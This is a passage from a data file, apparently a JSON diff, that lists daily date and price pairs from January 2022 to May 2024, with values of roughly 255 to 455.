], + [ + "2022-01-06", + 373.9875183105469 + ], + [ + "2022-01-07", + 369.9362487792969 + ], + [ + "2022-01-10", + 370.1796569824219 + ], + [ + "2022-01-11", + 375.74053955078125 + ], + [ + "2022-01-12", + 377.23052978515625 + ], + [ + "2022-01-13", + 367.7936706542969 + ], + [ + "2022-01-14", + 370.08233642578125 + ], + [ + "2022-01-18", + 360.8695068359375 + ], + [ + "2022-01-19", + 356.9057922363281 + ], + [ + "2022-01-20", + 352.2701416015625 + ], + [ + "2022-01-21", + 342.5021667480469 + ], + [ + "2022-01-24", + 344.07012939453125 + ], + [ + "2022-01-25", + 336.09405517578125 + ], + [ + "2022-01-26", + 335.56817626953125 + ], + [ + "2022-01-27", + 332.1888732910156 + ], + [ + "2022-01-28", + 342.6092834472656 + ], + [ + "2022-01-31", + 353.5654296875 + ], + [ + "2022-02-01", + 355.9708557128906 + ], + [ + "2022-02-02", + 358.86328125 + ], + [ + "2022-02-03", + 344.3136291503906 + ], + [ + "2022-02-04", + 348.6571350097656 + ], + [ + "2022-02-07", + 345.852294921875 + ], + [ + "2022-02-08", + 349.7380065917969 + ], + [ + "2022-02-09", + 357.1492919921875 + ], + [ + "2022-02-10", + 349.0660705566406 + ], + [ + "2022-02-11", + 337.99310302734375 + ], + [ + "2022-02-14", + 338.4118957519531 + ], + [ + "2022-02-15", + 346.8262023925781 + ], + [ + "2022-02-16", + 346.73858642578125 + ], + [ + "2022-02-17", + 336.4252624511719 + ], + [ + "2022-02-18", + 332.5881042480469 + ], + [ + "2022-02-22", + 329.24774169921875 + ], + [ + "2022-02-23", + 320.8139343261719 + ], + [ + "2022-02-24", + 331.5947570800781 + ], + [ + "2022-02-25", + 336.73681640625 + ], + [ + "2022-02-28", + 337.7398986816406 + ], + [ + "2022-03-01", + 332.5686340332031 + ], + [ + "2022-03-02", + 338.14898681640625 + ], + [ + "2022-03-03", + 333.318603515625 + ], + [ + "2022-03-04", + 328.48809814453125 + ], + [ + "2022-03-07", + 316.37310791015625 + ], + [ + "2022-03-08", + 314.9025573730469 + ], + [ + "2022-03-09", + 326.2384948730469 + ], + [ + "2022-03-10", + 322.61566162109375 + ], + [ + "2022-03-11", + 315.92510986328125 + ], + [ + "2022-03-14", + 309.8579406738281 + ], + [ + "2022-03-15", + 319.5771789550781 + ], + [ + "2022-03-16", + 331.42926025390625 + ], + [ + "2022-03-17", + 335.44158935546875 + ], + [ + "2022-03-18", + 342.307373046875 + ], + [ + "2022-03-21", + 341.3557434082031 + ], + [ + "2022-03-22", + 348.0643005371094 + ], + [ + "2022-03-23", + 343.06207275390625 + ], + [ + "2022-03-24", + 350.68719482421875 + ], + [ + "2022-03-25", + 350.39471435546875 + ], + [ + "2022-03-28", + 355.8161926269531 + ], + [ + "2022-03-29", + 361.93963623046875 + ], + [ + "2022-03-30", + 357.94183349609375 + ], + [ + "2022-03-31", + 353.5052185058594 + ], + [ + "2022-04-01", + 352.8324890136719 + ], + [ + "2022-04-04", + 360.0968017578125 + ], + [ + "2022-04-05", + 352.1011047363281 + ], + [ + "2022-04-06", + 344.4564514160156 + ], + [ + "2022-04-07", + 345.2756042480469 + ], + [ + "2022-04-08", + 340.4488830566406 + ], + [ + "2022-04-11", + 332.39483642578125 + ], + [ + "2022-04-12", + 330.99078369140625 + ], + [ + "2022-04-13", + 337.7187194824219 + ], + [ + "2022-04-14", + 329.99603271484375 + ], + [ + "2022-04-18", + 330.2496032714844 + ], + [ + "2022-04-19", + 337.6309509277344 + ], + [ + "2022-04-20", + 332.706787109375 + ], + [ + "2022-04-21", + 325.82275390625 + ], + [ + "2022-04-22", + 317.2907409667969 + ], + [ + "2022-04-25", + 321.3666076660156 + ], + [ + "2022-04-26", + 309.2366943359375 + ], + [ + "2022-04-27", + 308.8661193847656 + ], + [ + "2022-04-28", + 319.8357849121094 + ], + [ + "2022-04-29", + 305.443603515625 + ], + [ + "2022-05-02", + 310.54327392578125 + ], + [ + "2022-05-03", + 310.8747863769531 + ], + [ + "2022-05-04", + 321.3861389160156 + ], + [ + "2022-05-05", + 305.19976806640625 + ], + [ + "2022-05-06", + 301.54327392578125 + ], + [ + "2022-05-09", + 289.74481201171875 + ], + [ + "2022-05-10", + 293.26483154296875 + ], + [ + "2022-05-11", + 284.5671691894531 + ], + [ + "2022-05-12", + 283.894287109375 + ], + [ + "2022-05-13", + 294.4154357910156 + ], + [ + "2022-05-16", + 291.00262451171875 + ], + [ + "2022-05-17", + 298.5399475097656 + ], + [ + "2022-05-18", + 283.8845520019531 + ], + [ + "2022-05-19", + 282.3634338378906 + ], + [ + "2022-05-20", + 281.4858703613281 + ], + [ + "2022-05-23", + 286.1662902832031 + ], + [ + "2022-05-24", + 280.0816650390625 + ], + [ + "2022-05-25", + 284.0015869140625 + ], + [ + "2022-05-26", + 291.8704833984375 + ], + [ + "2022-05-27", + 301.3970031738281 + ], + [ + "2022-05-31", + 300.59747314453125 + ], + [ + "2022-06-01", + 298.374267578125 + ], + [ + "2022-06-02", + 306.5454406738281 + ], + [ + "2022-06-03", + 298.5692443847656 + ], + [ + "2022-06-06", + 299.5638122558594 + ], + [ + "2022-06-07", + 302.14776611328125 + ], + [ + "2022-06-08", + 299.97344970703125 + ], + [ + "2022-06-09", + 291.93878173828125 + ], + [ + "2022-06-10", + 281.6418762207031 + ], + [ + "2022-06-13", + 268.5466003417969 + ], + [ + "2022-06-14", + 269.0340881347656 + ], + [ + "2022-06-15", + 275.75244140625 + ], + [ + "2022-06-16", + 264.6268005371094 + ], + [ + "2022-06-17", + 267.844482421875 + ], + [ + "2022-06-21", + 274.6021728515625 + ], + [ + "2022-06-22", + 274.2016296386719 + ], + [ + "2022-06-23", + 278.2852478027344 + ], + [ + "2022-06-24", + 287.8203125 + ], + [ + "2022-06-27", + 285.7100830078125 + ], + [ + "2022-06-28", + 277.0054016113281 + ], + [ + "2022-06-29", + 277.2594299316406 + ], + [ + "2022-06-30", + 273.82061767578125 + ], + [ + "2022-07-01", + 275.6279602050781 + ], + [ + "2022-07-05", + 280.34661865234375 + ], + [ + "2022-07-06", + 282.1441345214844 + ], + [ + "2022-07-07", + 288.1817626953125 + ], + [ + "2022-07-08", + 288.54327392578125 + ], + [ + "2022-07-11", + 282.37872314453125 + ], + [ + "2022-07-12", + 279.6431884765625 + ], + [ + "2022-07-13", + 279.0668029785156 + ], + [ + "2022-07-14", + 280.0633544921875 + ], + [ + "2022-07-15", + 285.14349365234375 + ], + [ + "2022-07-18", + 282.7303466796875 + ], + [ + "2022-07-19", + 291.4252014160156 + ], + [ + "2022-07-20", + 296.0462951660156 + ], + [ + "2022-07-21", + 300.2960205078125 + ], + [ + "2022-07-22", + 295.0301818847656 + ], + [ + "2022-07-25", + 293.3498840332031 + ], + [ + "2022-07-26", + 287.58587646484375 + ], + [ + "2022-07-27", + 299.7391052246094 + ], + [ + "2022-07-28", + 302.6700134277344 + ], + [ + "2022-07-29", + 308.18975830078125 + ], + [ + "2022-08-01", + 308.0041809082031 + ], + [ + "2022-08-02", + 307.0858154296875 + ], + [ + "2022-08-03", + 315.4485168457031 + ], + [ + "2022-08-04", + 316.92376708984375 + ], + [ + "2022-08-05", + 314.3348693847656 + ], + [ + "2022-08-08", + 313.3187561035156 + ], + [ + "2022-08-09", + 309.77239990234375 + ], + [ + "2022-08-10", + 318.4184265136719 + ], + [ + "2022-08-11", + 316.6111145019531 + ], + [ + "2022-08-12", + 322.7757568359375 + ], + [ + "2022-08-15", + 325.3841857910156 + ], + [ + "2022-08-16", + 324.6221008300781 + ], + [ + "2022-08-17", + 320.9195251464844 + ], + [ + "2022-08-18", + 321.6912841796875 + ], + [ + "2022-08-19", + 315.4192199707031 + ], + [ + "2022-08-22", + 307.1151428222656 + ], + [ + "2022-08-23", + 306.8611755371094 + ], + [ + "2022-08-24", + 307.7500915527344 + ], + [ + "2022-08-25", + 313.1918029785156 + ], + [ + "2022-08-26", + 300.3546447753906 + ], + [ + "2022-08-29", + 297.39447021484375 + ], + [ + "2022-08-30", + 294.08251953125 + ], + [ + "2022-08-31", + 292.37286376953125 + ], + [ + "2022-09-01", + 292.4999694824219 + ], + [ + "2022-09-02", + 288.3673400878906 + ], + [ + "2022-09-06", + 286.2962341308594 + ], + [ + "2022-09-07", + 292.0798645019531 + ], + [ + "2022-09-08", + 293.5941467285156 + ], + [ + "2022-09-09", + 300.0126953125 + ], + [ + "2022-09-12", + 303.57855224609375 + ], + [ + "2022-09-13", + 286.9312744140625 + ], + [ + "2022-09-14", + 289.2075500488281 + ], + [ + "2022-09-15", + 284.3912048339844 + ], + [ + "2022-09-16", + 282.6521911621094 + ], + [ + "2022-09-19", + 284.8533020019531 + ], + [ + "2022-09-20", + 282.582763671875 + ], + [ + "2022-09-21", + 277.5227966308594 + ], + [ + "2022-09-22", + 274.10711669921875 + ], + [ + "2022-09-23", + 269.6441955566406 + ], + [ + "2022-09-26", + 268.5284729003906 + ], + [ + "2022-09-27", + 268.6361389160156 + ], + [ + "2022-09-28", + 273.9798889160156 + ], + [ + "2022-09-29", + 266.0816650390625 + ], + [ + "2022-09-30", + 261.5698547363281 + ], + [ + "2022-10-03", + 267.7062683105469 + ], + [ + "2022-10-04", + 276.123291015625 + ], + [ + "2022-10-05", + 275.9764709472656 + ], + [ + "2022-10-06", + 273.8037414550781 + ], + [ + "2022-10-07", + 263.3706359863281 + ], + [ + "2022-10-10", + 260.7379150390625 + ], + [ + "2022-10-11", + 257.1559143066406 + ], + [ + "2022-10-12", + 257.0677795410156 + ], + [ + "2022-10-13", + 263.0966491699219 + ], + [ + "2022-10-14", + 255.18862915039062 + ], + [ + "2022-10-17", + 263.6153259277344 + ], + [ + "2022-10-18", + 265.6999816894531 + ], + [ + "2022-10-19", + 264.73101806640625 + ], + [ + "2022-10-20", + 263.3804626464844 + ], + [ + "2022-10-21", + 269.5561218261719 + ], + [ + "2022-10-24", + 272.5215759277344 + ], + [ + "2022-10-25", + 278.1589050292969 + ], + [ + "2022-10-26", + 272.0127258300781 + ], + [ + "2022-10-27", + 267.0604553222656 + ], + [ + "2022-10-28", + 275.23260498046875 + ], + [ + "2022-10-31", + 272.0323181152344 + ], + [ + "2022-11-01", + 269.2527160644531 + ], + [ + "2022-11-02", + 260.0234375 + ], + [ + "2022-11-03", + 254.94398498535156 + ], + [ + "2022-11-04", + 259.04473876953125 + ], + [ + "2022-11-07", + 261.89288330078125 + ], + [ + "2022-11-08", + 263.8013000488281 + ], + [ + "2022-11-09", + 257.71368408203125 + ], + [ + "2022-11-10", + 276.7300109863281 + ], + [ + "2022-11-11", + 281.8291320800781 + ], + [ + "2022-11-14", + 279.36279296875 + ], + [ + "2022-11-15", + 283.2286376953125 + ], + [ + "2022-11-16", + 279.36279296875 + ], + [ + "2022-11-17", + 278.7461242675781 + ], + [ + "2022-11-18", + 278.7560119628906 + ], + [ + "2022-11-21", + 275.88836669921875 + ], + [ + "2022-11-22", + 279.86187744140625 + ], + [ + "2022-11-23", + 282.6708068847656 + ], + [ + "2022-11-25", + 280.8113098144531 + ], + [ + "2022-11-28", + 276.6908874511719 + ], + [ + "2022-11-29", + 274.5965270996094 + ], + [ + "2022-11-30", + 287.1141662597656 + ], + [ + "2022-12-01", + 287.46649169921875 + ], + [ + "2022-12-02", + 286.32135009765625 + ], + [ + "2022-12-05", + 281.5159912109375 + ], + [ + "2022-12-06", + 275.68280029296875 + ], + [ + "2022-12-07", + 274.5573425292969 + ], + [ + "2022-12-08", + 277.806640625 + ], + [ + "2022-12-09", + 276.0351257324219 + ], + [ + "2022-12-12", + 279.499755859375 + ], + [ + "2022-12-13", + 282.50439453125 + ], + [ + "2022-12-14", + 280.40997314453125 + ], + [ + "2022-12-15", + 270.9948425292969 + ], + [ + "2022-12-16", + 268.4109191894531 + ], + [ + "2022-12-19", + 264.63885498046875 + ], + [ + "2022-12-20", + 264.4328918457031 + ], + [ + "2022-12-21", + 268.268798828125 + ], + [ + "2022-12-22", + 261.7055358886719 + ], + [ + "2022-12-23", + 262.2941589355469 + ], + [ + "2022-12-27", + 258.58575439453125 + ], + [ + "2022-12-28", + 255.1717071533203 + ], + [ + "2022-12-29", + 261.3916015625 + ], + [ + "2022-12-30", + 261.234619140625 + ], + [ + "2023-01-03", + 259.46875 + ], + [ + "2023-01-04", + 260.7048645019531 + ], + [ + "2023-01-05", + 256.6236572265625 + ], + [ + "2023-01-06", + 263.70684814453125 + ], + [ + "2023-01-09", + 265.41387939453125 + ], + [ + "2023-01-10", + 267.66046142578125 + ], + [ + "2023-01-11", + 272.29107666015625 + ], + [ + "2023-01-12", + 273.7626647949219 + ], + [ + "2023-01-13", + 275.64630126953125 + ], + [ + "2023-01-17", + 276.2054748535156 + ], + [ + "2023-01-18", + 272.6147766113281 + ], + [ + "2023-01-19", + 269.9365539550781 + ], + [ + "2023-01-20", + 277.3238525390625 + ], + [ + "2023-01-23", + 283.48492431640625 + ], + [ + "2023-01-24", + 282.9061279296875 + ], + [ + "2023-01-25", + 282.2782287597656 + ], + [ + "2023-01-26", + 287.7818908691406 + ], + [ + "2023-01-27", + 290.6466064453125 + ], + [ + "2023-01-30", + 284.77008056640625 + ], + [ + "2023-01-31", + 289.0376281738281 + ], + [ + "2023-02-01", + 295.21826171875 + ], + [ + "2023-02-02", + 305.8136291503906 + ], + [ + "2023-02-03", + 300.3786315917969 + ], + [ + "2023-02-06", + 297.8376770019531 + ], + [ + "2023-02-07", + 304.00848388671875 + ], + [ + "2023-02-08", + 298.6028747558594 + ], + [ + "2023-02-09", + 295.9638671875 + ], + [ + "2023-02-10", + 294.0213928222656 + ], + [ + "2023-02-13", + 298.73040771484375 + ], + [ + "2023-02-14", + 300.93780517578125 + ], + [ + "2023-02-15", + 303.2432861328125 + ], + [ + "2023-02-16", + 297.55322265625 + ], + [ + "2023-02-17", + 295.4537048339844 + ], + [ + "2023-02-21", + 288.4588317871094 + ], + [ + "2023-02-22", + 288.6746520996094 + ], + [ + "2023-02-23", + 291.1959228515625 + ], + [ + "2023-02-24", + 286.3200988769531 + ], + [ + "2023-02-27", + 288.3704833984375 + ], + [ + "2023-02-28", + 287.9977111816406 + ], + [ + "2023-03-01", + 285.6824645996094 + ], + [ + "2023-03-02", + 288.0467224121094 + ], + [ + "2023-03-03", + 294.001708984375 + ], + [ + "2023-03-06", + 294.3353271484375 + ], + [ + "2023-03-07", + 290.7250671386719 + ], + [ + "2023-03-08", + 292.17706298828125 + ], + [ + "2023-03-09", + 287.11474609375 + ], + [ + "2023-03-10", + 283.08258056640625 + ], + [ + "2023-03-13", + 285.1820983886719 + ], + [ + "2023-03-14", + 291.7355651855469 + ], + [ + "2023-03-15", + 293.26593017578125 + ], + [ + "2023-03-16", + 300.9967041015625 + ], + [ + "2023-03-17", + 299.5741271972656 + ], + [ + "2023-03-20", + 300.6372985839844 + ], + [ + "2023-03-21", + 304.93115234375 + ], + [ + "2023-03-22", + 300.78466796875 + ], + [ + "2023-03-23", + 304.3514099121094 + ], + [ + "2023-03-24", + 305.4715881347656 + ], + [ + "2023-03-27", + 303.3786926269531 + ], + [ + "2023-03-28", + 301.7672424316406 + ], + [ + "2023-03-29", + 307.2696228027344 + ], + [ + "2023-03-30", + 310.1780700683594 + ], + [ + "2023-03-31", + 315.3365478515625 + ], + [ + "2023-04-03", + 314.57012939453125 + ], + [ + "2023-04-04", + 313.50897216796875 + ], + [ + "2023-04-05", + 310.4139099121094 + ], + [ + "2023-04-06", + 312.5067138671875 + ], + [ + "2023-04-10", + 312.3299255371094 + ], + [ + "2023-04-11", + 310.325439453125 + ], + [ + "2023-04-12", + 307.5841064453125 + ], + [ + "2023-04-13", + 313.6072082519531 + ], + [ + "2023-04-14", + 313.0177001953125 + ], + [ + "2023-04-17", + 313.282958984375 + ], + [ + "2023-04-18", + 313.3026123046875 + ], + [ + "2023-04-19", + 313.15521240234375 + ], + [ + "2023-04-20", + 310.7676086425781 + ], + [ + "2023-04-21", + 311.0918884277344 + ], + [ + "2023-04-24", + 310.4433288574219 + ], + [ + "2023-04-25", + 304.58721923828125 + ], + [ + "2023-04-26", + 306.4344482421875 + ], + [ + "2023-04-27", + 314.7667236328125 + ], + [ + "2023-04-28", + 316.9381103515625 + ], + [ + "2023-05-01", + 316.5746154785156 + ], + [ + "2023-05-02", + 313.8135681152344 + ], + [ + "2023-05-03", + 311.7599792480469 + ], + [ + "2023-05-04", + 310.6595458984375 + ], + [ + "2023-05-05", + 317.2624206542969 + ], + [ + "2023-05-08", + 318.0484619140625 + ], + [ + "2023-05-09", + 316.0342102050781 + ], + [ + "2023-05-10", + 319.4732360839844 + ], + [ + "2023-05-11", + 320.5146789550781 + ], + [ + "2023-05-12", + 319.3650817871094 + ], + [ + "2023-05-15", + 321.09442138671875 + ], + [ + "2023-05-16", + 321.4579772949219 + ], + [ + "2023-05-17", + 325.3489685058594 + ], + [ + "2023-05-18", + 331.3916931152344 + ], + [ + "2023-05-19", + 330.6450500488281 + ], + [ + "2023-05-22", + 331.7552795410156 + ], + [ + "2023-05-23", + 327.5498962402344 + ], + [ + "2023-05-24", + 325.8697204589844 + ], + [ + "2023-05-25", + 333.79913330078125 + ], + [ + "2023-05-26", + 342.3277587890625 + ], + [ + "2023-05-30", + 343.8802795410156 + ], + [ + "2023-05-31", + 341.9248962402344 + ], + [ + "2023-06-01", + 345.8749084472656 + ], + [ + "2023-06-02", + 348.4688415527344 + ], + [ + "2023-06-05", + 348.71453857421875 + ], + [ + "2023-06-06", + 348.6555480957031 + ], + [ + "2023-06-07", + 342.7405090332031 + ], + [ + "2023-06-08", + 346.9949645996094 + ], + [ + "2023-06-09", + 348.3214416503906 + ], + [ + "2023-06-12", + 354.20709228515625 + ], + [ + "2023-06-13", + 356.9288635253906 + ], + [ + "2023-06-14", + 359.5227355957031 + ], + [ + "2023-06-15", + 363.80682373046875 + ], + [ + "2023-06-16", + 361.517333984375 + ], + [ + "2023-06-20", + 360.9998474121094 + ], + [ + "2023-06-21", + 356.0802917480469 + ], + [ + "2023-06-22", + 360.2816467285156 + ], + [ + "2023-06-23", + 356.7099304199219 + ], + [ + "2023-06-26", + 351.92803955078125 + ], + [ + "2023-06-27", + 357.9792175292969 + ], + [ + "2023-06-28", + 358.6778259277344 + ], + [ + "2023-06-29", + 357.9595642089844 + ], + [ + "2023-06-30", + 363.4793395996094 + ], + [ + "2023-07-03", + 364.3353576660156 + ], + [ + "2023-07-05", + 364.3255615234375 + ], + [ + "2023-07-06", + 361.55084228515625 + ], + [ + "2023-07-07", + 360.3504943847656 + ], + [ + "2023-07-10", + 360.4685363769531 + ], + [ + "2023-07-11", + 362.2494812011719 + ], + [ + "2023-07-12", + 366.82464599609375 + ], + [ + "2023-07-13", + 373.0528564453125 + ], + [ + "2023-07-14", + 372.97418212890625 + ], + [ + "2023-07-17", + 376.45721435546875 + ], + [ + "2023-07-18", + 379.53692626953125 + ], + [ + "2023-07-19", + 379.4483947753906 + ], + [ + "2023-07-20", + 370.7013244628906 + ], + [ + "2023-07-21", + 369.5894470214844 + ], + [ + "2023-07-24", + 370.1798095703125 + ], + [ + "2023-07-25", + 372.6888122558594 + ], + [ + "2023-07-26", + 371.4490661621094 + ], + [ + "2023-07-27", + 370.56353759765625 + ], + [ + "2023-07-28", + 377.313232421875 + ], + [ + "2023-07-31", + 377.510009765625 + ], + [ + "2023-08-01", + 376.6343688964844 + ], + [ + "2023-08-02", + 368.36944580078125 + ], + [ + "2023-08-03", + 367.77911376953125 + ], + [ + "2023-08-04", + 366.0572204589844 + ], + [ + "2023-08-07", + 369.15655517578125 + ], + [ + "2023-08-08", + 366.017822265625 + ], + [ + "2023-08-09", + 361.9936218261719 + ], + [ + "2023-08-10", + 362.6626892089844 + ], + [ + "2023-08-11", + 360.3504943847656 + ], + [ + "2023-08-14", + 364.39434814453125 + ], + [ + "2023-08-15", + 360.5275573730469 + ], + [ + "2023-08-16", + 356.7099304199219 + ], + [ + "2023-08-17", + 352.81365966796875 + ], + [ + "2023-08-18", + 352.37091064453125 + ], + [ + "2023-08-21", + 358.048095703125 + ], + [ + "2023-08-22", + 357.53643798828125 + ], + [ + "2023-08-23", + 363.17425537109375 + ], + [ + "2023-08-24", + 355.4112548828125 + ], + [ + "2023-08-25", + 358.1661682128906 + ], + [ + "2023-08-28", + 360.8620910644531 + ], + [ + "2023-08-29", + 368.7432556152344 + ], + [ + "2023-08-30", + 370.7996826171875 + ], + [ + "2023-08-31", + 371.9115295410156 + ], + [ + "2023-09-01", + 371.5179138183594 + ], + [ + "2023-09-05", + 371.9902648925781 + ], + [ + "2023-09-06", + 368.7137756347656 + ], + [ + "2023-09-07", + 366.0768737792969 + ], + [ + "2023-09-08", + 366.5885314941406 + ], + [ + "2023-09-11", + 370.9079284667969 + ], + [ + "2023-09-12", + 366.7951965332031 + ], + [ + "2023-09-13", + 368.1922607421875 + ], + [ + "2023-09-14", + 371.203125 + ], + [ + "2023-09-15", + 364.846923828125 + ], + [ + "2023-09-18", + 365.2273254394531 + ], + [ + "2023-09-19", + 364.4489440917969 + ], + [ + "2023-09-20", + 359.19696044921875 + ], + [ + "2023-09-21", + 352.6148986816406 + ], + [ + "2023-09-22", + 352.6641845703125 + ], + [ + "2023-09-25", + 354.3392028808594 + ], + [ + "2023-09-26", + 349.0184326171875 + ], + [ + "2023-09-27", + 349.83624267578125 + ], + [ + "2023-09-28", + 352.76275634765625 + ], + [ + "2023-09-29", + 353.0189514160156 + ], + [ + "2023-10-02", + 355.965087890625 + ], + [ + "2023-10-03", + 349.71807861328125 + ], + [ + "2023-10-04", + 354.47723388671875 + ], + [ + "2023-10-05", + 353.4327087402344 + ], + [ + "2023-10-06", + 359.3547058105469 + ], + [ + "2023-10-09", + 361.18743896484375 + ], + [ + "2023-10-10", + 363.18768310546875 + ], + [ + "2023-10-11", + 365.7790832519531 + ], + [ + "2023-10-12", + 364.508056640625 + ], + [ + "2023-10-13", + 359.9261779785156 + ], + [ + "2023-10-16", + 363.99560546875 + ], + [ + "2023-10-17", + 362.80340576171875 + ], + [ + "2023-10-18", + 358.04412841796875 + ], + [ + "2023-10-19", + 354.6939697265625 + ], + [ + "2023-10-20", + 349.4026794433594 + ], + [ + "2023-10-23", + 350.4570007324219 + ], + [ + "2023-10-24", + 353.8663330078125 + ], + [ + "2023-10-25", + 345.20513916015625 + ], + [ + "2023-10-26", + 338.6230773925781 + ], + [ + "2023-10-27", + 340.2488708496094 + ], + [ + "2023-10-30", + 344.0818786621094 + ], + [ + "2023-10-31", + 345.7274169921875 + ], + [ + "2023-11-01", + 351.7281494140625 + ], + [ + "2023-11-02", + 358.1131286621094 + ], + [ + "2023-11-03", + 362.3205261230469 + ], + [ + "2023-11-06", + 363.798583984375 + ], + [ + "2023-11-07", + 367.2374267578125 + ], + [ + "2023-11-08", + 367.47393798828125 + ], + [ + "2023-11-09", + 364.6459655761719 + ], + [ + "2023-11-10", + 372.84405517578125 + ], + [ + "2023-11-13", + 371.6813049316406 + ], + [ + "2023-11-14", + 379.6822509765625 + ], + [ + "2023-11-15", + 379.9680480957031 + ], + [ + "2023-11-16", + 380.29327392578125 + ], + [ + "2023-11-17", + 380.38189697265625 + ], + [ + "2023-11-20", + 385.0130310058594 + ], + [ + "2023-11-21", + 382.7763366699219 + ], + [ + "2023-11-22", + 384.3430480957031 + ], + [ + "2023-11-24", + 383.80108642578125 + ], + [ + "2023-11-27", + 383.4660339355469 + ], + [ + "2023-11-28", + 384.4710693359375 + ], + [ + "2023-11-29", + 384.0966491699219 + ], + [ + "2023-11-30", + 383.1310119628906 + ], + [ + "2023-12-01", + 384.2247314453125 + ], + [ + "2023-12-04", + 380.6578369140625 + ], + [ + "2023-12-05", + 381.61358642578125 + ], + [ + "2023-12-06", + 379.40643310546875 + ], + [ + "2023-12-07", + 384.7076110839844 + ], + [ + "2023-12-08", + 386.42205810546875 + ], + [ + "2023-12-11", + 389.72296142578125 + ], + [ + "2023-12-12", + 392.8267822265625 + ], + [ + "2023-12-13", + 397.82244873046875 + ], + [ + "2023-12-14", + 397.4776611328125 + ], + [ + "2023-12-15", + 399.3990478515625 + ], + [ + "2023-12-18", + 401.9147033691406 + ], + [ + "2023-12-19", + 403.9682922363281 + ], + [ + "2023-12-20", + 397.96551513671875 + ], + [ + "2023-12-21", + 402.595947265625 + ], + [ + "2023-12-22", + 403.1982116699219 + ], + [ + "2023-12-26", + 405.66650390625 + ], + [ + "2023-12-27", + 406.4922790527344 + ], + [ + "2023-12-28", + 406.29473876953125 + ], + [ + "2023-12-29", + 404.53643798828125 + ], + [ + "2024-01-02", + 397.6907653808594 + ], + [ + "2024-01-03", + 393.48260498046875 + ], + [ + "2024-01-04", + 391.4575500488281 + ], + [ + "2024-01-05", + 391.9218444824219 + ], + [ + "2024-01-08", + 400.02203369140625 + ], + [ + "2024-01-09", + 400.8122863769531 + ], + [ + "2024-01-10", + 403.52886962890625 + ], + [ + "2024-01-11", + 404.3684997558594 + ], + [ + "2024-01-12", + 404.575927734375 + ], + [ + "2024-01-16", + 404.53643798828125 + ], + [ + "2024-01-17", + 402.2545166015625 + ], + [ + "2024-01-18", + 407.9642028808594 + ], + [ + "2024-01-19", + 416.0545349121094 + ], + [ + "2024-01-22", + 416.5978088378906 + ], + [ + "2024-01-23", + 418.3265686035156 + ], + [ + "2024-01-24", + 420.6479187011719 + ], + [ + "2024-01-25", + 421.16156005859375 + ], + [ + "2024-01-26", + 418.65252685546875 + ], + [ + "2024-01-29", + 422.939697265625 + ], + [ + "2024-01-30", + 420.1243591308594 + ], + [ + "2024-01-31", + 411.895751953125 + ], + [ + "2024-02-01", + 416.7460021972656 + ], + [ + "2024-02-02", + 423.78924560546875 + ], + [ + "2024-02-05", + 423.23602294921875 + ], + [ + "2024-02-06", + 422.38653564453125 + ], + [ + "2024-02-07", + 426.7330017089844 + ], + [ + "2024-02-08", + 427.52325439453125 + ], + [ + "2024-02-09", + 431.7314147949219 + ], + [ + "2024-02-12", + 430.0422058105469 + ], + [ + "2024-02-13", + 423.3348388671875 + ], + [ + "2024-02-14", + 427.947998046875 + ], + [ + "2024-02-15", + 429.22235107421875 + ], + [ + "2024-02-16", + 425.33026123046875 + ], + [ + "2024-02-20", + 422.11981201171875 + ], + [ + "2024-02-21", + 420.4305725097656 + ], + [ + "2024-02-22", + 432.7389831542969 + ], + [ + "2024-02-23", + 431.4646911621094 + ], + [ + "2024-02-26", + 431.2374267578125 + ], + [ + "2024-02-27", + 432.274658203125 + ], + [ + "2024-02-28", + 429.9730224609375 + ], + [ + "2024-02-29", + 433.6576232910156 + ], + [ + "2024-03-01", + 440.18719482421875 + ], + [ + "2024-03-04", + 438.6165466308594 + ], + [ + "2024-03-05", + 430.7434997558594 + ], + [ + "2024-03-06", + 433.4501953125 + ], + [ + "2024-03-07", + 440.0291748046875 + ], + [ + "2024-03-08", + 433.6774597167969 + ], + [ + "2024-03-11", + 432.0672607421875 + ], + [ + "2024-03-12", + 438.260986328125 + ], + [ + "2024-03-13", + 434.8924865722656 + ], + [ + "2024-03-14", + 433.79595947265625 + ], + [ + "2024-03-15", + 428.6395263671875 + ], + [ + "2024-03-18", + 432.7276306152344 + ], + [ + "2024-03-19", + 433.8057861328125 + ], + [ + "2024-03-20", + 438.9492492675781 + ], + [ + "2024-03-21", + 441.0265197753906 + ], + [ + "2024-03-22", + 441.5309143066406 + ], + [ + "2024-03-25", + 439.92852783203125 + ], + [ + "2024-03-26", + 438.504150390625 + ], + [ + "2024-03-27", + 439.9977722167969 + ], + [ + "2024-03-28", + 439.1866760253906 + ], + [ + "2024-04-01", + 440.116455078125 + ], + [ + "2024-04-02", + 436.318115234375 + ], + [ + "2024-04-03", + 437.29742431640625 + ], + [ + "2024-04-04", + 430.61083984375 + ], + [ + "2024-04-05", + 435.6850891113281 + ], + [ + "2024-04-08", + 435.813720703125 + ], + [ + "2024-04-09", + 437.42596435546875 + ], + [ + "2024-04-10", + 433.60791015625 + ], + [ + "2024-04-11", + 440.53192138671875 + ], + [ + "2024-04-12", + 433.509033203125 + ], + [ + "2024-04-15", + 426.3773498535156 + ], + [ + "2024-04-16", + 426.4169006347656 + ], + [ + "2024-04-17", + 421.21405029296875 + ], + [ + "2024-04-18", + 418.81048583984375 + ], + [ + "2024-04-19", + 410.1455993652344 + ], + [ + "2024-04-22", + 414.27032470703125 + ], + [ + "2024-04-23", + 420.452392578125 + ], + [ + "2024-04-24", + 421.87677001953125 + ], + [ + "2024-04-25", + 419.839111328125 + ], + [ + "2024-04-26", + 426.3180236816406 + ], + [ + "2024-04-29", + 428.0489807128906 + ], + [ + "2024-04-30", + 419.9776306152344 + ], + [ + "2024-05-01", + 416.9410095214844 + ], + [ + "2024-05-02", + 422.2625427246094 + ], + [ + "2024-05-03", + 430.74932861328125 + ], + [ + "2024-05-06", + 435.467529296875 + ], + [ + "2024-05-07", + 435.5367431640625 + ], + [ + "2024-05-08", + 435.27960205078125 + ], + [ + "2024-05-09", + 436.2291259765625 + ], + [ + "2024-05-10", + 437.2578430175781 + ], + [ + "2024-05-13", + 438.2667236328125 + ], + [ + "2024-05-14", + 441.0857849121094 + ], + [ + "2024-05-15", + 447.9800720214844 + ], + [ + "2024-05-16", + 447.0700988769531 + ], + [ + "2024-05-17", + 446.85247802734375 + ], + [ + "2024-05-20", + 449.9682922363281 + ], + [ + "2024-05-21", + 450.8485412597656 + ], + [ + "2024-05-22", + 450.7595520019531 + ], + [ + "2024-05-23", + 448.7318420410156 + ], + [ + "2024-05-24", + 452.9752502441406 + ], + [ + "2024-05-28", + 454.6864318847656 + ], + [ + "2024-05-29", + 451.4816589355469 + ], + [ + "2024-05-30", + 446.64471435546875 + ], + [ + "2024-05-31", + 445.8138732910156 + 